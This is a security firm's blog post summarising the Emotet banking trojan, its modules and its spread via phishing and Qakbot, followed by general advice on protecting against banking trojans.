Si Cyber Intel: Emotet – The Rise Of Banking Trojans
Back in June, Symantec uncovered activities being undertaken by the threat group known as Mealybug. The group, first identified in 2014, built and executed malware named 'Emotet' to spread banking Trojans that would steal online banking information from users based in Europe. Once on the network, Emotet has the capability to self-propagate allowing it to spread aggressively.
Since then Mealybug's threat activities have evolved somewhat, from maintaining and delivering its own banking trojan to offering their custom-built banking trojan to similar threat actors, benefiting by taking a cut from their earnings. Delivered via phishing emails, threat actors are able to steal private information and download other payloads from the command-and-control server to then execute them.
The most recent version of the banking trojan, Emotet, has new modules added in the form of an email client module which allows the trojan to steal email credentials, banking modules that steal the user’s banking information, a browsing history and password infosteal module, PST infosteal module allowing the trojan to read through private message archives on Microsoft Outlook in order to steal email addresses and data and finally a DDoS attack module.
Emotet also has the capability to self-propagate Qakbot malware, a sister-like banking trojan that acts and behaves like a worm by using a Windows PowerShell script to download and harvest credentials using the increasing popular Mimikatz malware.
How to protect yourself:
The rise of banking trojans are increasing as new threats are uncovered daily. To avoid being a victim of a banking trojan, we recommend the following:
- Enforce the Two-Factor Authentication(2FA). This two-step verification is an extra layer of security that is known as "multi factor authentication" that requires not only a password and username but also something that only you know
- Make sure internet routers at home and in the office are updated with recent patches and security updates
- Verify websites that you are redirected to have HTTPS enabled and are encrypted with trusted certificates
- Avoid installing mobile applications from unknown sources. By default, Google prevents users from installing apps from sources other than the Play Store. We recommend that you leave the installation of apps from unknown sources disabled
- Avoid opening links received by SMS messages, WhatsApp or other applications from unknown sources
- Avoid downloading third-party applications or responding to suspicious messages
For information about Si Cyber’s malware detection and response capabilities, please contact firstname.lastname@example.org